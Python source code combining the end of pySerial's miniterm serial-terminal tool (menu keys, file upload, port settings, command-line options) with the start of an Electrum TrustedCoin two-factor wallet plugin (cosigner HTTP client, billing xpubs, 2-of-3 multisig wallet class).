    sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
        ('active' if self.serial.rts else 'inactive'),
        ('active' if self.serial.dtr else 'inactive'),
        ('active' if self.serial.break_condition else 'inactive')))
    try:
        # Input control lines (driven by the peer/modem).
        sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
            ('active' if self.serial.cts else 'inactive'),
            ('active' if self.serial.dsr else 'inactive'),
            ('active' if self.serial.ri else 'inactive'),
            ('active' if self.serial.cd else 'inactive')))
    except serial.SerialException:
        # on RFC 2217 ports, it can happen if no modem state notification was
        # yet received. ignore this error.
        pass
    sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
    sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
    sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
    sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
    sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
    sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
    """loop and copy serial->console"""
    try:
        while self.alive and self._reader_alive:
            # read all that is there or wait for one byte
            data = self.serial.read(self.serial.in_waiting or 1)
            if data:
                if self.raw:
                    # Raw mode: bytes go straight through, no decode.
                    self.console.write_bytes(data)
                else:
                    text = self.rx_decoder.decode(data)
                    for transformation in self.rx_transformations:
                        text = transformation.rx(text)
                    self.console.write(text)
    except serial.SerialException:
        self.alive = False
        # Unblock the writer thread stuck in getkey().
        self.console.cancel()
        raise  # XXX handle instead of re-raise?
def writer(self):
    """\
    Loop and copy console->serial until self.exit_character character is
    found. When self.menu_character is found, interpret the next key
    locally.
    """
    menu_active = False
    try:
        while self.alive:
            try:
                c = self.console.getkey()
            except KeyboardInterrupt:
                # treat Ctrl-C in the console as a literal ^C byte
                c = '\x03'
            if not self.alive:
                break
            if menu_active:
                # previous key was the menu character: dispatch this one
                self.handle_menu_key(c)
                menu_active = False
            elif c == self.menu_character:
                menu_active = True  # next char will be for menu
            elif c == self.exit_character:
                self.stop()  # exit app
                break
            else:
                #~ if self.raw:
                # run the tx filter chain, then encode and send
                text = c
                for transformation in self.tx_transformations:
                    text = transformation.tx(text)
                self.serial.write(self.tx_encoder.encode(text))
                if self.echo:
                    echo_text = c
                    for transformation in self.tx_transformations:
                        echo_text = transformation.echo(echo_text)
                    self.console.write(echo_text)
    except:
        # deliberately broad: mark the app dead, then let the error propagate
        self.alive = False
        raise
def handle_menu_key(self, c):
    """Implement a simple menu / settings"""
    if c == self.menu_character or c == self.exit_character:
        # Menu/exit character again -> send itself
        self.serial.write(self.tx_encoder.encode(c))
        if self.echo:
            self.console.write(c)
    elif c == '\x15':  # CTRL+U -> upload file
        self.upload_file()
    elif c in '\x08hH?':  # CTRL+H, h, H, ? -> Show help
        sys.stderr.write(self.get_help_text())
    elif c == '\x12':  # CTRL+R -> Toggle RTS
        self.serial.rts = not self.serial.rts
        sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
    elif c == '\x04':  # CTRL+D -> Toggle DTR
        self.serial.dtr = not self.serial.dtr
        sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
    elif c == '\x02':  # CTRL+B -> toggle BREAK condition
        self.serial.break_condition = not self.serial.break_condition
        sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
    elif c == '\x05':  # CTRL+E -> toggle local echo
        self.echo = not self.echo
        sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
    elif c == '\x06':  # CTRL+F -> edit filters
        self.change_filter()
    elif c == '\x0c':  # CTRL+L -> EOL mode
        # cycle through the EOL modes in declaration order
        modes = list(EOL_TRANSFORMATIONS)  # keys
        eol = modes.index(self.eol) + 1
        if eol >= len(modes):
            eol = 0
        self.eol = modes[eol]
        sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
        self.update_transformations()
    elif c == '\x01':  # CTRL+A -> set encoding
        self.change_encoding()
    elif c == '\x09':  # CTRL+I -> info
        self.dump_port_settings()
    #~ elif c == '\x01':  # CTRL+A -> cycle escape mode
    #~ elif c == '\x0c':  # CTRL+L -> cycle linefeed mode
    elif c in 'pP':  # P -> change port
        self.change_port()
    elif c in 'sS':  # S -> suspend / open port temporarily
        self.suspend_port()
    elif c in 'bB':  # B -> change baudrate
        self.change_baudrate()
    elif c == '8':  # 8 -> change to 8 bits
        self.serial.bytesize = serial.EIGHTBITS
        self.dump_port_settings()
    elif c == '7':  # 7 -> change to 7 bits
        self.serial.bytesize = serial.SEVENBITS
        self.dump_port_settings()
    elif c in 'eE':  # E -> change to even parity
        self.serial.parity = serial.PARITY_EVEN
        self.dump_port_settings()
    elif c in 'oO':  # O -> change to odd parity
        self.serial.parity = serial.PARITY_ODD
        self.dump_port_settings()
    elif c in 'mM':  # M -> change to mark parity
        self.serial.parity = serial.PARITY_MARK
        self.dump_port_settings()
    elif c in 'sS':  # S -> change to space parity
        # NOTE(review): unreachable — 'sS' is already consumed by the
        # suspend_port branch above, so space parity can never be selected.
        self.serial.parity = serial.PARITY_SPACE
        self.dump_port_settings()
    elif c in 'nN':  # N -> change to no parity
        self.serial.parity = serial.PARITY_NONE
        self.dump_port_settings()
    elif c == '1':  # 1 -> change to 1 stop bits
        self.serial.stopbits = serial.STOPBITS_ONE
        self.dump_port_settings()
    elif c == '2':  # 2 -> change to 2 stop bits
        self.serial.stopbits = serial.STOPBITS_TWO
        self.dump_port_settings()
    elif c == '3':  # 3 -> change to 1.5 stop bits
        self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
        self.dump_port_settings()
    elif c in 'xX':  # X -> change software flow control
        self.serial.xonxoff = (c == 'X')
        self.dump_port_settings()
    elif c in 'rR':  # R -> change hardware flow control
        self.serial.rtscts = (c == 'R')
        self.dump_port_settings()
    else:
        sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
    """Ask user for filename and send its contents over the serial port."""
    sys.stderr.write('\n--- File to upload: ')
    sys.stderr.flush()
    # temporarily restore normal console mode while reading the filename
    with self.console:
        filename = sys.stdin.readline().rstrip('\r\n')
        if filename:
            try:
                with open(filename, 'rb') as f:
                    sys.stderr.write('--- Sending file {} ---\n'.format(filename))
                    while True:
                        block = f.read(1024)
                        if not block:
                            break
                        self.serial.write(block)
                        # Wait for output buffer to drain.
                        self.serial.flush()
                        sys.stderr.write('.')  # Progress indicator.
                sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
            except IOError as e:
                sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
    """change the i/o transformations"""
    sys.stderr.write('\n--- Available Filters:\n')
    sys.stderr.write('\n'.join(
        '--- {:<10} = {.__doc__}'.format(k, v)
        for k, v in sorted(TRANSFORMATIONS.items())))
    sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
    with self.console:
        new_filters = sys.stdin.readline().lower().split()
    if new_filters:
        # for/else: the else only runs if no unknown filter caused a break,
        # i.e. all names validated -> accept the new filter list
        for f in new_filters:
            if f not in TRANSFORMATIONS:
                sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
                break
        else:
            self.filters = new_filters
            self.update_transformations()
    sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
    """change encoding on the serial port"""
    sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
    with self.console:
        candidate = sys.stdin.readline().strip()
    if candidate:
        # accept the name only if the codecs registry knows it
        try:
            codecs.lookup(candidate)
        except LookupError:
            sys.stderr.write('--- invalid encoding name: {}\n'.format(candidate))
        else:
            self.set_rx_encoding(candidate)
            self.set_tx_encoding(candidate)
    sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
    sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
    """change the baudrate"""
    sys.stderr.write('\n--- Baudrate: ')
    sys.stderr.flush()
    with self.console:
        previous = self.serial.baudrate
        try:
            entered = int(sys.stdin.readline().strip())
            self.serial.baudrate = entered
        except ValueError as e:
            # bad input: report and restore the old baudrate
            sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
            self.serial.baudrate = previous
        else:
            self.dump_port_settings()
def change_port(self):
    """Have a conversation with the user to change the serial port.

    Keeps the old port open until the new one has been opened successfully,
    so a failed attempt leaves the session usable.
    """
    with self.console:
        try:
            port = ask_for_port()
        except KeyboardInterrupt:
            port = None
    if port and port != self.serial.port:
        # reader thread needs to be shut down
        self._stop_reader()
        # save settings
        settings = self.serial.getSettingsDict()
        # BUGFIX: if serial_for_url() itself raises, new_serial was unbound
        # and the except clause crashed with UnboundLocalError.
        new_serial = None
        try:
            new_serial = serial.serial_for_url(port, do_not_open=True)
            # restore settings and open
            new_serial.applySettingsDict(settings)
            new_serial.rts = self.serial.rts
            new_serial.dtr = self.serial.dtr
            new_serial.open()
            new_serial.break_condition = self.serial.break_condition
        except Exception as e:
            sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
            if new_serial is not None:
                new_serial.close()
        else:
            self.serial.close()
            self.serial = new_serial
            sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
        # and restart the reader thread
        self._start_reader()
def suspend_port(self):
    """\
    open port temporarily, allow reconnect, exit and port change to get
    out of the loop
    """
    # reader thread needs to be shut down
    self._stop_reader()
    self.serial.close()
    sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
    do_change_port = False
    # loop until the port is open again, or the user quits / changes port
    while not self.serial.is_open:
        sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
            exit=key_description(self.exit_character)))
        k = self.console.getkey()
        if k == self.exit_character:
            self.stop()  # exit app
            break
        elif k in 'pP':
            do_change_port = True
            break
        try:
            self.serial.open()
        except Exception as e:
            sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
    if do_change_port:
        self.change_port()
    else:
        # and restart the reader thread
        self._start_reader()
        sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
    """return the help text"""
    # help text, starts with blank line!
    # NOTE: the template body is a runtime string shown to the user; it is
    # left untouched and only filled with the configured hotkeys below.
    return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
           exit=key_description(self.exit_character),
           menu=key_description(self.menu_character),
           rts=key_description('\x12'),
           dtr=key_description('\x04'),
           brk=key_description('\x02'),
           echo=key_description('\x05'),
           info=key_description('\x09'),
           upload=key_description('\x15'),
           repr=key_description('\x01'),
           filter=key_description('\x06'),
           eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
    """Command line tool, entry point.

    The default_* parameters allow wrapper scripts to pre-configure the tool
    (e.g. a miniterm-my-device.py).
    """
    import argparse
    parser = argparse.ArgumentParser(
        description="Miniterm - A simple terminal program for the serial port.")
    parser.add_argument(
        "port",
        nargs='?',
        help="serial port name ('-' to show port list)",
        default=default_port)
    parser.add_argument(
        "baudrate",
        nargs='?',
        type=int,
        help="set baud rate, default: %(default)s",
        default=default_baudrate)
    group = parser.add_argument_group("port settings")
    group.add_argument(
        "--parity",
        choices=['N', 'E', 'O', 'S', 'M'],
        type=lambda c: c.upper(),
        help="set parity, one of {N E O S M}, default: N",
        default='N')
    group.add_argument(
        "--rtscts",
        action="store_true",
        help="enable RTS/CTS flow control (default off)",
        default=False)
    group.add_argument(
        "--xonxoff",
        action="store_true",
        help="enable software flow control (default off)",
        default=False)
    group.add_argument(
        "--rts",
        type=int,
        help="set initial RTS line state (possible values: 0, 1)",
        default=default_rts)
    group.add_argument(
        "--dtr",
        type=int,
        help="set initial DTR line state (possible values: 0, 1)",
        default=default_dtr)
    group.add_argument(
        "--ask",
        action="store_true",
        help="ask again for port when open fails",
        default=False)
    group = parser.add_argument_group("data handling")
    group.add_argument(
        "-e", "--echo",
        action="store_true",
        help="enable local echo (default off)",
        default=False)
    group.add_argument(
        "--encoding",
        dest="serial_port_encoding",
        metavar="CODEC",
        help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
        default='UTF-8')
    group.add_argument(
        "-f", "--filter",
        action="append",
        metavar="NAME",
        help="add text transformation",
        default=[])
    group.add_argument(
        "--eol",
        choices=['CR', 'LF', 'CRLF'],
        type=lambda c: c.upper(),
        help="end of line mode",
        default='CRLF')
    group.add_argument(
        "--raw",
        action="store_true",
        help="Do no apply any encodings/transformations",
        default=False)
    group = parser.add_argument_group("hotkeys")
    group.add_argument(
        "--exit-char",
        type=int,
        metavar='NUM',
        help="Unicode of special character that is used to exit the application, default: %(default)s",
        default=0x1d)  # GS/CTRL+]
    group.add_argument(
        "--menu-char",
        type=int,
        metavar='NUM',
        help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
        default=0x14)  # Menu: CTRL+T
    group = parser.add_argument_group("diagnostics")
    group.add_argument(
        "-q", "--quiet",
        action="store_true",
        help="suppress non-error messages",
        default=False)
    group.add_argument(
        "--develop",
        action="store_true",
        help="show Python traceback on error",
        default=False)
    args = parser.parse_args()
    if args.menu_char == args.exit_char:
        parser.error('--exit-char can not be the same as --menu-char')
    if args.filter:
        # 'help' is a pseudo filter name: list the real ones and exit
        if 'help' in args.filter:
            sys.stderr.write('Available filters:\n')
            sys.stderr.write('\n'.join(
                '{:<10} = {.__doc__}'.format(k, v)
                for k, v in sorted(TRANSFORMATIONS.items())))
            sys.stderr.write('\n')
            sys.exit(1)
        filters = args.filter
    else:
        filters = ['default']
    # retry loop: keep asking for a port (when --ask) until one opens
    while True:
        # no port given on command line -> ask user now
        if args.port is None or args.port == '-':
            try:
                args.port = ask_for_port()
            except KeyboardInterrupt:
                sys.stderr.write('\n')
                parser.error('user aborted and port is not given')
        else:
            if not args.port:
                parser.error('port is not given')
        try:
            serial_instance = serial.serial_for_url(
                args.port,
                args.baudrate,
                parity=args.parity,
                rtscts=args.rtscts,
                xonxoff=args.xonxoff,
                do_not_open=True)
            if not hasattr(serial_instance, 'cancel_read'):
                # enable timeout for alive flag polling if cancel_read is not available
                serial_instance.timeout = 1
            if args.dtr is not None:
                if not args.quiet:
                    sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
                serial_instance.dtr = args.dtr
            if args.rts is not None:
                if not args.quiet:
                    sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
                serial_instance.rts = args.rts
            serial_instance.open()
        except serial.SerialException as e:
            sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
            if args.develop:
                raise
            if not args.ask:
                sys.exit(1)
            else:
                args.port = '-'
        else:
            break
    miniterm = Miniterm(
        serial_instance,
        echo=args.echo,
        eol=args.eol.lower(),
        filters=filters)
    # unichr: presumably provided by a py2/py3 compatibility shim earlier in
    # this file (aliased to chr on py3) — TODO confirm
    miniterm.exit_character = unichr(args.exit_char)
    miniterm.menu_character = unichr(args.menu_char)
    miniterm.raw = args.raw
    miniterm.set_rx_encoding(args.serial_port_encoding)
    miniterm.set_tx_encoding(args.serial_port_encoding)
    if not args.quiet:
        sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
            p=miniterm.serial))
        sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
            key_description(miniterm.exit_character),
            key_description(miniterm.menu_character),
            key_description(miniterm.menu_character),
            key_description('\x08')))
    miniterm.start()
    try:
        # join(True) also forwards KeyboardInterrupt handling to the threads
        miniterm.join(True)
    except KeyboardInterrupt:
        pass
    if not args.quiet:
        sys.stderr.write("\n--- exit ---\n")
    miniterm.join()
    miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Script entry point when run directly.
if __name__ == '__main__':
    main()
|
trustedcoin.py | #!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum_exos import ecc, constants, keystore, version, bip32, bitcoin
from electrum_exos.bitcoin import TYPE_ADDRESS
from electrum_exos.bip32 import BIP32Node, xpub_type
from electrum_exos.crypto import sha256
from electrum_exos.transaction import TxOutput
from electrum_exos.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum_exos.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_exos.i18n import _
from electrum_exos.plugin import BasePlugin, hook
from electrum_exos.util import NotEnoughFunds, UserFacingException
from electrum_exos.storage import STO_EV_USER_PW
from electrum_exos.network import Network
from electrum_exos.base_wizard import BaseWizard
from electrum_exos.logging import Logger
def get_signing_xpub(xtype):
    """Return the TrustedCoin server's signing xpub for *xtype*."""
    if xtype not in ('standard', 'p2wsh'):
        raise NotImplementedError('xtype: {}'.format(xtype))
    if constants.net.TESTNET:
        xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
    else:
        xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
    if xtype == 'standard':
        return xpub
    # convert the xkey header to the requested script type
    return BIP32Node.from_xkey(xpub)._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
    """Return the xpub from which billing addresses are derived."""
    if not constants.net.TESTNET:
        return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
    return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
# Wizard disclaimer text, one paragraph per list entry (desktop GUI).
DISCLAIMER = [
    _("Two-factor authentication is a service provided by TrustedCoin. "
      "It uses a multi-signature wallet, where you own 2 of 3 keys. "
      "The third key is stored on a remote server that signs transactions on "
      "your behalf. To use this service, you will need a smartphone with "
      "Google Authenticator installed."),
    _("A small fee will be charged on each transaction that uses the "
      "remote server. You may check and modify your billing preferences "
      "once the installation is complete."),
    _("Note that your coins are not locked in this service. You may withdraw "
      "your funds at any time and at no cost, without the remote server, by "
      "using the 'restore wallet' option with your wallet seed."),
    _("The next step will generate the seed of your wallet. This seed will "
      "NOT be saved in your computer, and it must be stored on paper. "
      "To be safe from malware, you may want to do this on an offline "
      "computer, and move your wallet later to an online computer."),
]
# Shorter disclaimer variant for the Kivy (mobile) GUI.
KIVY_DISCLAIMER = [
    _("Two-factor authentication is a service provided by TrustedCoin. "
      "To use it, you must have a separate device with Google Authenticator."),
    _("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
      "The third key is stored on a remote server that signs transactions on "
      "your behalf. A small fee will be charged on each transaction that uses the "
      "remote server."),
    _("Note that your coins are not locked in this service. You may withdraw "
      "your funds at any time and at no cost, without the remote server, by "
      "using the 'restore wallet' option with your wallet seed."),
]
# Prompt shown when restoring an existing 2FA wallet from seed.
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
    """Error reported by the TrustedCoin server; carries the HTTP status."""

    def __init__(self, message, status_code=0):
        super().__init__(message)
        self.status_code = status_code
class ErrorConnectingServer(Exception):
    """Raised when the TrustedCoin server cannot be reached."""

    def __init__(self, reason: Union[str, Exception] = None):
        self.reason = reason

    def __str__(self):
        prefix = _("Error connecting to {} server").format('TrustedCoin')
        detail = self.reason
        if isinstance(detail, BaseException):
            detail = repr(detail)
        if detail:
            return f"{prefix}:\n{detail}"
        return prefix
class TrustedCoinCosignerClient(Logger):
    """HTTP client for the TrustedCoin cosigning API (api.trustedcoin.com)."""

    def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
        self.base_url = base_url
        self.debug = False
        self.user_agent = user_agent
        Logger.__init__(self)

    async def handle_response(self, resp: ClientResponse):
        """Decode a server response; raise TrustedCoinException on non-200."""
        if resp.status != 200:
            try:
                r = await resp.json()
                message = r['message']
            except Exception:
                # body is not JSON (or lacks 'message'): report it as text.
                # (was a bare except; narrowed so task cancellation propagates)
                message = await resp.text()
            raise TrustedCoinException(message, resp.status)
        try:
            return await resp.json()
        except Exception:
            return await resp.text()

    def send_request(self, method, relative_url, data=None, *, headers=None, timeout=None):
        """Issue a GET/POST through the Electrum proxy-aware HTTP helper.

        :param headers: optional extra headers to send (new, backward-compatible
            parameter; needed by transfer_credit's x-signature header)
        :raises ErrorConnectingServer: offline or transport-level failure
        :raises TrustedCoinException: server returned a non-200 status
        """
        network = Network.get_instance()
        if not network:
            raise ErrorConnectingServer('You are offline.')
        url = urljoin(self.base_url, relative_url)
        if self.debug:
            self.logger.debug(f'<-- {method} {url} {data}')
        all_headers = dict(headers) if headers else {}
        if self.user_agent:
            all_headers['user-agent'] = self.user_agent
        try:
            if method == 'get':
                response = Network.send_http_on_proxy(method, url,
                                                      params=data,
                                                      headers=all_headers,
                                                      on_finish=self.handle_response,
                                                      timeout=timeout)
            elif method == 'post':
                response = Network.send_http_on_proxy(method, url,
                                                      json=data,
                                                      headers=all_headers,
                                                      on_finish=self.handle_response,
                                                      timeout=timeout)
            else:
                assert False
        except TrustedCoinException:
            raise
        except Exception as e:
            raise ErrorConnectingServer(e)
        else:
            if self.debug:
                self.logger.debug(f'--> {response}')
            return response

    def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
        """
        Returns the TOS for the given billing plan as a plain/text unicode string.
        :param billing_plan: the plan to return the terms for
        """
        payload = {'billing_plan': billing_plan}
        return self.send_request('get', 'tos', payload)

    def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
        """
        Creates a new cosigner resource.
        :param xpubkey1: a bip32 extended public key (customarily the hot key)
        :param xpubkey2: a bip32 extended public key (customarily the cold key)
        :param email: a contact email
        :param billing_plan: the billing plan for the cosigner
        """
        payload = {
            'email': email,
            'xpubkey1': xpubkey1,
            'xpubkey2': xpubkey2,
            'billing_plan': billing_plan,
        }
        return self.send_request('post', 'cosigner', payload)

    def auth(self, id, otp):
        """
        Attempt to authenticate for a particular cosigner.
        :param id: the id of the cosigner
        :param otp: the one time password
        """
        payload = {'otp': otp}
        return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)

    def get(self, id):
        """ Get billing info """
        return self.send_request('get', 'cosigner/%s' % quote(id))

    def get_challenge(self, id):
        """ Get challenge to reset Google Auth secret """
        return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))

    def reset_auth(self, id, challenge, signatures):
        """ Reset Google Auth secret """
        payload = {'challenge': challenge, 'signatures': signatures}
        return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)

    def sign(self, id, transaction, otp):
        """
        Attempt to authenticate for a particular cosigner.
        :param id: the id of the cosigner
        :param transaction: the hex encoded [partially signed] compact transaction to sign
        :param otp: the one time password
        """
        payload = {
            'otp': otp,
            'transaction': transaction
        }
        return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
                                 timeout=60)

    def transfer_credit(self, id, recipient, otp, signature_callback):
        """
        Transfer a cosigner's credits to another cosigner.
        :param id: the id of the sending cosigner
        :param recipient: the id of the recipient cosigner
        :param otp: the one time password (of the sender)
        :param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
        """
        payload = {
            'otp': otp,
            'recipient': recipient,
            'timestamp': int(time.time()),
        }
        relative_url = 'cosigner/%s/transfer' % quote(id)
        full_url = urljoin(self.base_url, relative_url)
        headers = {
            'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
        }
        # BUGFIX: headers was previously passed as a 4th positional argument,
        # but send_request's 4th parameter (timeout) is keyword-only, so this
        # call always raised TypeError.  Pass it via the new headers kwarg.
        return self.send_request('post', relative_url, payload, headers=headers)
# Module-level client shared by the wallet and plugin classes below.
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
    """2-of-3 multisig wallet where the third key is held by TrustedCoin."""

    wallet_type = '2fa'

    def __init__(self, storage):
        self.m, self.n = 2, 3
        # NOTE: deliberately skips Multisig_Wallet.__init__ and calls the
        # grandparent directly — m/n are fixed above instead of parsed from
        # the wallet type string.
        Deterministic_Wallet.__init__(self, storage)
        self.is_billing = False
        self.billing_info = None
        self._load_billing_addresses()

    def _load_billing_addresses(self):
        """Load known billing addresses (both types) from storage."""
        billing_addresses = {
            'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
            'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
        }
        self._billing_addresses = {}  # type: Dict[str, Dict[int, str]]  # addr_type -> index -> addr
        self._billing_addresses_set = set()  # set of addrs
        for addr_type, d in list(billing_addresses.items()):
            self._billing_addresses[addr_type] = {}
            # convert keys from str to int (JSON storage stringifies them)
            for index, addr in d.items():
                self._billing_addresses[addr_type][int(index)] = addr
                self._billing_addresses_set.add(addr)

    def can_sign_without_server(self):
        # True when we hold the private key for x2/ (e.g. restored from seed)
        return not self.keystores['x2/'].is_watching_only()

    def get_user_id(self):
        return get_user_id(self.storage)

    def min_prepay(self):
        # smallest prepay bundle offered by the server
        return min(self.price_per_tx.keys())

    def num_prepay(self, config):
        # user-configured bundle size, clamped to what the server offers
        default = self.min_prepay()
        n = config.get('trustedcoin_prepay', default)
        if n not in self.price_per_tx:
            n = default
        return n

    def extra_fee(self, config):
        """Return the TrustedCoin fee (in sats) to add to the next tx, or 0."""
        if self.can_sign_without_server():
            return 0
        if self.billing_info is None:
            # billing info unknown yet: kick off a fetch, charge nothing now
            self.plugin.start_request_thread(self)
            return 0
        if self.billing_info.get('tx_remaining'):
            return 0
        if self.is_billing:
            return 0
        n = self.num_prepay(config)
        price = int(self.price_per_tx[n])
        # sanity cap: refuse absurd per-tx fees
        if price > 100000 * n:
            raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
        return price

    def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
                                  change_addr=None, is_sweep=False):
        mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
            self, coins, o, config, fixed_fee, change_addr)
        fee = self.extra_fee(config) if not is_sweep else 0
        if fee:
            address = self.billing_info['billing_address_segwit']
            fee_output = TxOutput(TYPE_ADDRESS, address, fee)
            try:
                tx = mk_tx(outputs + [fee_output])
            except NotEnoughFunds:
                # TrustedCoin won't charge if the total inputs is
                # lower than their fee
                tx = mk_tx(outputs)
                if tx.input_value() >= fee:
                    # inputs could have covered the fee, so the shortfall is
                    # real: re-raise NotEnoughFunds
                    raise
                self.logger.info("not charging for this tx")
        else:
            tx = mk_tx(outputs)
        return tx

    def on_otp(self, tx, otp):
        """Send *tx* to the server for its signature, gated by the OTP."""
        if not otp:
            self.logger.info("sign_transaction: no auth code")
            return
        otp = int(otp)
        long_user_id, short_id = self.get_user_id()
        raw_tx = tx.serialize()
        try:
            r = server.sign(short_id, raw_tx, otp)
        except TrustedCoinException as e:
            if e.status_code == 400:  # invalid OTP
                raise UserFacingException(_('Invalid one-time password.')) from e
            else:
                raise
        if r:
            raw_tx = r.get('transaction')
            tx.update(raw_tx)
        self.logger.info(f"twofactor: is complete {tx.is_complete()}")
        # reset billing_info
        self.billing_info = None
        self.plugin.start_request_thread(self)

